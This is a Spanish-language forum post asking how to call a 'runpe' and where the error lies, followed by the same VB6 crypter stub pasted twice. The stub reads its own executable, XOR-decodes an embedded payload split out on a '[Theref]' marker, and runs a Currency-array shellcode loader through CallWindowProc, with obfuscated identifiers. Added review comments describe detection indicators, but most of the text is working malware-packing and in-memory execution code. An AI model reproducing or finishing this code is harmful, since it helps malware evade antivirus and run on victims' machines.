hola a todos
¿Cómo puedo llamar a este runpe?
¿Alguien puede decirme dónde está el error?
' Entry point of the stub. Reads this program's own .exe from disk, splits the
' raw contents on the literal marker "[Theref]", runs element 1 through the XOR
' routine below with element 2 as the second argument, and passes the result to runpe.
' NOTE(review): a program that opens its own image, cuts it on a marker and
' decodes the tail in memory has the usual shape of a crypter stub. The marker
' string and the self-read are both usable as static / behavioural indicators.
Sub Main()
Dim AAAA As String
' Full path of the running executable.
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
' Load the whole file into a string buffer sized to the file length.
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1
Dim sData() As String
' Element 0 is everything before the first marker; only elements 1 and 2 are used below.
sData() = Split(BBBB, "[Theref]")
' Element 1 is decoded in place; element 2 is what the routine uses as its key.
' Both therefore sit in the same file on disk, separated by the marker.
sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2))
' runpe is not shown on this page. It is given the decoded string and the
' executable's own path converted with vbFromUnicode.
Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))
End Sub
' Labelled "RC4" by the author, but the body is a repeating-key XOR: there is no
' key schedule and no state array, only data(i) Xor key(j) with j wrapping to 0.
' First argument: the string to transform. Second argument: the key string.
' Returns the transformed bytes converted back to a string with vbUnicode.
' NOTE(review): the transform is its own inverse, and Main takes the key from the
' same file as the data, so an analyst can recover the embedded content statically
' without running the sample. Rules looking for RC4 constants will not match this.
Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String
' Key bytes.
Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte
' Data bytes, transformed in place.
Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte
' Data index; never assigned before the loop, so it starts at the Long default of 0.
Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long
' Key index; likewise starts at 0.
Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long
' Upper bound of the data array.
Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long
' Upper bound of the key array.
Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long
' Convert both strings to byte arrays.
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode)
DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode)
YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E)
ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj)
' Walk every data byte, XOR it with the current key byte, and advance both indices.
Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®)
úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1
' Wrap the key index once it passes the last key byte.
If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0
ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1
Loop
' Release the key array before building the return value.
Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj
¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode)
Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E
End Function
'RUNPE
' Import of CallWindowProcA from user32, declared with every argument as a ByVal Long.
' With this declaration the first argument is an ordinary number, so any address can
' be handed to the API as the procedure to call; eseguiPE below passes VarPtr(Asm(0)).
' NOTE(review): this import used with a pointer that comes from VarPtr on a data array,
' rather than from a real window procedure, is a well-known VB6 indicator of
' machine code being run out of a data buffer.
Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
' Fills a 122-element Currency array with fixed constants and then asks
' CallWindowProc to call the address of its first element, passing the address of
' data(0), Ptr_To_Inject and CommandlineEnabled as the remaining arguments.
' Returns whatever CallWindowProc returns.
' Currency is an 8-byte type, so the array is a 976-byte blob whose raw bytes are
' treated as executable code rather than as numbers.
' NOTE(review): what that code does cannot be read from the constants here. The page
' labels it "RUNPE" and "shellcode", so it is presumably an in-memory PE loader;
' confirm by dumping the array bytes and disassembling them in an isolated analysis
' environment.
' NOTE(review): long runs of Currency (or other numeric) literals assigned to one array,
' followed by VarPtr of element 0 passed to an API that takes a callback, make a
' practical static detection pattern for this technique. Where DEP is enforced for
' the process, executing from a data array like this should fault.
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
Dim Asm(121) As Currency
Asm(0) = 400681687.6885@
Asm(1) = -476253789078555.0612@
Asm(2) = 169590654935207.5756@
Asm(3) = 850533864474419.4055@
Asm(4) = 737729641913629.2885@
Asm(5) = 241583047782310.0933@
Asm(6) = 24366994722224.3183@
Asm(7) = -5591197446420.7926@
Asm(8) = 909185617598340.8258@
Asm(9) = -19175285449154.725@
Asm(10) = -74963712694652.2037@
Asm(11) = 364813893865675.1812@
Asm(12) = 417268265771289.998@
Asm(13) = -4467533218940.2859@
Asm(14) = 341408918860883.873@
Asm(15) = 24329165641253.0572@
Asm(16) = -704495800380865.7131@
Asm(17) = 374040769202653.0293@
Asm(18) = 132891045878384.5141@
Asm(19) = 330853606455412.8782@
Asm(20) = -18546831736735.2555@
Asm(21) = 319791640719971.9498@
Asm(22) = 908565053235531.3645@
Asm(23) = 204495311115001.8554@
Asm(24) = -854751321242618.2143@
Asm(25) = -74261121419612.3536@
Asm(26) = -853017920184789.9651@
Asm(27) = 853018044985278.6574@
Asm(28) = 11660982868296.5087@
Asm(29) = -644057630032745.1903@
Asm(30) = 389428549114434.7534@
Asm(31) = -76145685875174.3891@
Asm(32) = -74907416031185.4908@
Asm(33) = 494446016607881.1334@
Asm(34) = 373919167982197.785@
Asm(35) = -702326214173594.214@
Asm(36) = 852984839970549.146@
Asm(37) = 878491366656617.7029@
Asm(38) = 11660149244069.3242@
Asm(39) = -644057520081529.9839@
Asm(40) = 852992269963661.735@
Asm(41) = 118191623639287.4757@
Asm(42) = -61508987237432.1588@
Asm(43) = 683482598548397.6903@
Asm(44) = -602576477534616.4219@
Asm(45) = 312616265869225.0362@
Asm(46) = 823209967166017.4093@
Asm(47) = 242250886584983.6374@
Asm(48) = 855453146203670.4029@
Asm(49) = -79066168407783.6283@
Asm(50) = -566073494675362.3812@
Asm(51) = 707480649289074.6628@
Asm(52) = -637454398289603.5604@
Asm(53) = 244386299675628.5445@
Asm(54) = -815078417416403.5827@
Asm(55) = -18879051943875.1995@
Asm(56) = -822123707815930.6686@
Asm(57) = -18434021046527.2954@
Asm(58) = 912451606937402.8942@
Asm(59) = -644057520081529.9756@
Asm(60) = 736754098641473.959@
Asm(61) = 417322719301766.6436@
Asm(62) = 907260734372726.4513@
Asm(63) = 853017967675867.3294@
Asm(64) = 11660982865150.7807@
Asm(65) = -854635987033189.5019@
Asm(66) = 417315068676156.9237@
Asm(67) = -704495800377680.6639@
Asm(68) = 244384539136657.2125@
Asm(69) = -815078417416403.5827@
Asm(70) = 364126617392252.4421@
Asm(71) = 853022663170544.6404@
Asm(72) = -855129000041499.1355@
Asm(73) = 853017946071693.9733@
Asm(74) = 244396803451753.601@
Asm(75) = -535694978088672.9971@
Asm(76) = 853017945341749.0318@
Asm(77) = 850597150951837.7055@
Asm(78) = -693956410164477.1442@
Asm(79) = 392299672072137.6649@
Asm(80) = -75273081301284.3259@
Asm(81) = 233670410612668.8112@
Asm(82) = 232135816315923.5976@
Asm(83) = 282468056240967.6881@
Asm(84) = -701595207746232.5423@
Asm(85) = 173478023424630.523@
Asm(86) = -838890426140287.6832@
Asm(87) = 137505075359453.7978@
Asm(88) = 238303243668856.6869@
Asm(89) = 15754679864024.2693@
Asm(90) = 137137957478099.5152@
Asm(91) = 223974408162476.2226@
Asm(92) = -853018149249239.2854@
Asm(93) = 609147958724062.3211@
Asm(94) = 187716700156924.5176@
Asm(95) = 29051557366465.6234@
Asm(96) = 180486733836584.4849@
Asm(97) = -853018043593043.5209@
Asm(98) = 230703534374533.4347@
Asm(99) = 138151919766295.2044@
Asm(100) = -863941699156868.1112@
Asm(101) = 382501322004887.7562@
Asm(102) = 217671250279223.4602@
Asm(103) = -858396642110759.3865@
Asm(104) = 382501330594822.3482@
Asm(105) = 217671250279223.4602@
Asm(106) = -860029196975681.1913@
Asm(107) = 22128918341666.201@
Asm(108) = 129708668231386.2504@
Asm(109) = 138421474714790.2981@
Asm(110) = 273938087394568.7415@
Asm(111) = -703427576466491.6105@
Asm(112) = 368089803424522.0018@
Asm(113) = 273936330801683.6989@
Asm(114) = -703427576466491.6105@
Asm(115) = 382501322232107.5439@
Asm(116) = 224650062758754.033@
Asm(117) = -802975918546864.1941@
Asm(118) = 261111522452255.6862@
Asm(119) = 35367660677206.1368@
Asm(120) = 848492795353964.3185@
Asm(121) = 5.0164@
'Put Here the shellcode
' The array's address goes in the slot CallWindowProc treats as the procedure to call;
' the other three values are forwarded to it unchanged, and the last argument is 0.
eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function
¿Cómo puedo llamar a este runpe?
¿Alguien puede decirme dónde está el error?
' Entry point of the stub (second copy of the same listing on this page). Reads this
' program's own .exe from disk, splits the raw contents on the literal marker
' "[Theref]", runs element 1 through the XOR routine below with element 2 as the
' second argument, and passes the result to runpe.
' NOTE(review): a program that opens its own image, cuts it on a marker and
' decodes the tail in memory has the usual shape of a crypter stub. The marker
' string and the self-read are both usable as static / behavioural indicators.
Sub Main()
Dim AAAA As String
' Full path of the running executable.
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
' Load the whole file into a string buffer sized to the file length.
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1
Dim sData() As String
' Element 0 is everything before the first marker; only elements 1 and 2 are used below.
sData() = Split(BBBB, "[Theref]")
' Element 1 is decoded in place; element 2 is what the routine uses as its key.
' Both therefore sit in the same file on disk, separated by the marker.
sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2))
' runpe is not shown on this page. It is given the decoded string and the
' executable's own path converted with vbFromUnicode.
Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))
End Sub
' Labelled "RC4" by the author, but the body is a repeating-key XOR: there is no
' key schedule and no state array, only data(i) Xor key(j) with j wrapping to 0.
' First argument: the string to transform. Second argument: the key string.
' Returns the transformed bytes converted back to a string with vbUnicode.
' NOTE(review): the transform is its own inverse, and Main takes the key from the
' same file as the data, so an analyst can recover the embedded content statically
' without running the sample. Rules looking for RC4 constants will not match this.
Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String
' Key bytes.
Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte
' Data bytes, transformed in place.
Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte
' Data index; never assigned before the loop, so it starts at the Long default of 0.
Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long
' Key index; likewise starts at 0.
Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long
' Upper bound of the data array.
Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long
' Upper bound of the key array.
Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long
' Convert both strings to byte arrays.
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode)
DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode)
YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E)
ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj)
' Walk every data byte, XOR it with the current key byte, and advance both indices.
Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®)
úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1
' Wrap the key index once it passes the last key byte.
If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0
ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1
Loop
' Release the key array before building the return value.
Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj
¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode)
Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E
End Function
'RUNPE
' Import of CallWindowProcA from user32, declared with every argument as a ByVal Long.
' With this declaration the first argument is an ordinary number, so any address can
' be handed to the API as the procedure to call; eseguiPE below passes VarPtr(Asm(0)).
' NOTE(review): this import used with a pointer that comes from VarPtr on a data array,
' rather than from a real window procedure, is a well-known VB6 indicator of
' machine code being run out of a data buffer.
Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
' Fills a 122-element Currency array with fixed constants and then asks
' CallWindowProc to call the address of its first element, passing the address of
' data(0), Ptr_To_Inject and CommandlineEnabled as the remaining arguments.
' Returns whatever CallWindowProc returns.
' Currency is an 8-byte type, so the array is a 976-byte blob whose raw bytes are
' treated as executable code rather than as numbers.
' NOTE(review): what that code does cannot be read from the constants here. The page
' labels it "RUNPE" and "shellcode", so it is presumably an in-memory PE loader;
' confirm by dumping the array bytes and disassembling them in an isolated analysis
' environment.
' NOTE(review): long runs of Currency (or other numeric) literals assigned to one array,
' followed by VarPtr of element 0 passed to an API that takes a callback, make a
' practical static detection pattern for this technique. Where DEP is enforced for
' the process, executing from a data array like this should fault.
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
Dim Asm(121) As Currency
Asm(0) = 400681687.6885@
Asm(1) = -476253789078555.0612@
Asm(2) = 169590654935207.5756@
Asm(3) = 850533864474419.4055@
Asm(4) = 737729641913629.2885@
Asm(5) = 241583047782310.0933@
Asm(6) = 24366994722224.3183@
Asm(7) = -5591197446420.7926@
Asm(8) = 909185617598340.8258@
Asm(9) = -19175285449154.725@
Asm(10) = -74963712694652.2037@
Asm(11) = 364813893865675.1812@
Asm(12) = 417268265771289.998@
Asm(13) = -4467533218940.2859@
Asm(14) = 341408918860883.873@
Asm(15) = 24329165641253.0572@
Asm(16) = -704495800380865.7131@
Asm(17) = 374040769202653.0293@
Asm(18) = 132891045878384.5141@
Asm(19) = 330853606455412.8782@
Asm(20) = -18546831736735.2555@
Asm(21) = 319791640719971.9498@
Asm(22) = 908565053235531.3645@
Asm(23) = 204495311115001.8554@
Asm(24) = -854751321242618.2143@
Asm(25) = -74261121419612.3536@
Asm(26) = -853017920184789.9651@
Asm(27) = 853018044985278.6574@
Asm(28) = 11660982868296.5087@
Asm(29) = -644057630032745.1903@
Asm(30) = 389428549114434.7534@
Asm(31) = -76145685875174.3891@
Asm(32) = -74907416031185.4908@
Asm(33) = 494446016607881.1334@
Asm(34) = 373919167982197.785@
Asm(35) = -702326214173594.214@
Asm(36) = 852984839970549.146@
Asm(37) = 878491366656617.7029@
Asm(38) = 11660149244069.3242@
Asm(39) = -644057520081529.9839@
Asm(40) = 852992269963661.735@
Asm(41) = 118191623639287.4757@
Asm(42) = -61508987237432.1588@
Asm(43) = 683482598548397.6903@
Asm(44) = -602576477534616.4219@
Asm(45) = 312616265869225.0362@
Asm(46) = 823209967166017.4093@
Asm(47) = 242250886584983.6374@
Asm(48) = 855453146203670.4029@
Asm(49) = -79066168407783.6283@
Asm(50) = -566073494675362.3812@
Asm(51) = 707480649289074.6628@
Asm(52) = -637454398289603.5604@
Asm(53) = 244386299675628.5445@
Asm(54) = -815078417416403.5827@
Asm(55) = -18879051943875.1995@
Asm(56) = -822123707815930.6686@
Asm(57) = -18434021046527.2954@
Asm(58) = 912451606937402.8942@
Asm(59) = -644057520081529.9756@
Asm(60) = 736754098641473.959@
Asm(61) = 417322719301766.6436@
Asm(62) = 907260734372726.4513@
Asm(63) = 853017967675867.3294@
Asm(64) = 11660982865150.7807@
Asm(65) = -854635987033189.5019@
Asm(66) = 417315068676156.9237@
Asm(67) = -704495800377680.6639@
Asm(68) = 244384539136657.2125@
Asm(69) = -815078417416403.5827@
Asm(70) = 364126617392252.4421@
Asm(71) = 853022663170544.6404@
Asm(72) = -855129000041499.1355@
Asm(73) = 853017946071693.9733@
Asm(74) = 244396803451753.601@
Asm(75) = -535694978088672.9971@
Asm(76) = 853017945341749.0318@
Asm(77) = 850597150951837.7055@
Asm(78) = -693956410164477.1442@
Asm(79) = 392299672072137.6649@
Asm(80) = -75273081301284.3259@
Asm(81) = 233670410612668.8112@
Asm(82) = 232135816315923.5976@
Asm(83) = 282468056240967.6881@
Asm(84) = -701595207746232.5423@
Asm(85) = 173478023424630.523@
Asm(86) = -838890426140287.6832@
Asm(87) = 137505075359453.7978@
Asm(88) = 238303243668856.6869@
Asm(89) = 15754679864024.2693@
Asm(90) = 137137957478099.5152@
Asm(91) = 223974408162476.2226@
Asm(92) = -853018149249239.2854@
Asm(93) = 609147958724062.3211@
Asm(94) = 187716700156924.5176@
Asm(95) = 29051557366465.6234@
Asm(96) = 180486733836584.4849@
Asm(97) = -853018043593043.5209@
Asm(98) = 230703534374533.4347@
Asm(99) = 138151919766295.2044@
Asm(100) = -863941699156868.1112@
Asm(101) = 382501322004887.7562@
Asm(102) = 217671250279223.4602@
Asm(103) = -858396642110759.3865@
Asm(104) = 382501330594822.3482@
Asm(105) = 217671250279223.4602@
Asm(106) = -860029196975681.1913@
Asm(107) = 22128918341666.201@
Asm(108) = 129708668231386.2504@
Asm(109) = 138421474714790.2981@
Asm(110) = 273938087394568.7415@
Asm(111) = -703427576466491.6105@
Asm(112) = 368089803424522.0018@
Asm(113) = 273936330801683.6989@
Asm(114) = -703427576466491.6105@
Asm(115) = 382501322232107.5439@
Asm(116) = 224650062758754.033@
Asm(117) = -802975918546864.1941@
Asm(118) = 261111522452255.6862@
Asm(119) = 35367660677206.1368@
Asm(120) = 848492795353964.3185@
Asm(121) = 5.0164@
'Put Here the shellcode
' The array's address goes in the slot CallWindowProc treats as the procedure to call;
' the other three values are forwarded to it unchanged, and the last argument is 0.
eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function